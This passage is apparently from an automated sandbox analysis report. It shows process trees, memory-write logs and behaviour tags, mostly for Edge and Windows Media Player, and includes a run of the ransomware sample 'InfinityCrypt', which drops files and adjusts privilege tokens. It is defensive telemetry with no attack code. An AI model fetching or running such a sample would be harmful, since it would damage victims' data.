3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 1096 3344 msedge.exe 102 PID 3344 wrote to memory of 1096 3344 msedge.exe 102 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 PID 3344 wrote to memory of 2392 3344 msedge.exe 104 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\Super The Movie Trailer V3.mp4"1⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Program Files (x86)\Windows Media Player\setup_wm.exe"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\Super The Movie Trailer V3.mp4"2⤵PID:4584
-
-
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon2⤵
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:4176
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff882e546f8,0x7ff882e54708,0x7ff882e547182⤵PID:3788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:22⤵PID:2272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:82⤵PID:2392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:4272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:12⤵PID:952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:12⤵PID:4712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:12⤵PID:5048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4660 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4660 /prefetch:82⤵PID:3660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:12⤵PID:5116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:12⤵PID:2248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5428 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3428 /prefetch:82⤵PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:12⤵PID:3756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2296 /prefetch:12⤵PID:832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:12⤵PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3084 /prefetch:12⤵PID:3884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1924 /prefetch:12⤵PID:2464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:12⤵PID:3660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:12⤵PID:2936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:12⤵PID:2248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:12⤵PID:2784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:12⤵PID:4196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:12⤵PID:4876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:12⤵PID:1132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:12⤵PID:4720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:12⤵PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6640 /prefetch:82⤵PID:1988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:12⤵PID:3272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6220 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,719851188819351283,7218428718566077089,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6112 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1080
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4540
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4032
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2764
-
C:\Users\Admin\AppData\Local\Temp\Temp1_InfinityCrypt.zip\Endermanch@InfinityCrypt.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_InfinityCrypt.zip\Endermanch@InfinityCrypt.exe"1⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:3460
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3532
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1280
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaulted170f8fh0d0fh49c6hb147h20c4d4590fdc1⤵PID:2400
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff882e546f8,0x7ff882e54708,0x7ff882e547182⤵PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,3957363042100294770,8494285987384476479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:32⤵PID:2340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,3957363042100294770,8494285987384476479,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:22⤵PID:2432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaulteba54a75h11e2h4cc0ha891h73bc898fd5d91⤵PID:1556
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff882e546f8,0x7ff882e54708,0x7ff882e547182⤵PID:1632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,15569343547719167175,9043422496852948220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:32⤵PID:2432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultd874cb6bh3c72h41afhbb7dh73a53fd2a7441⤵PID:4932
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff882e546f8,0x7ff882e54708,0x7ff882e547182⤵PID:2912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,11264661698136398472,17401572767685865103,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,11264661698136398472,17401572767685865103,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:22⤵PID:3640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbab32d97hf3a0h4eabhab6ahe1a322b4f8c81⤵PID:1548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff882e546f8,0x7ff882e54708,0x7ff882e547182⤵PID:4860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,13260538820635957983,4676886925017885262,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:22⤵PID:1800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,13260538820635957983,4676886925017885262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4908
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:4988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault301feabdh919ch4f4ah804dhdc776eb90b651⤵PID:2360
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff882e546f8,0x7ff882e54708,0x7ff882e547182⤵PID:3940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,16056130862161103810,9824843396358749917,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:22⤵PID:5160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,16056130862161103810,9824843396358749917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:5168
-
-
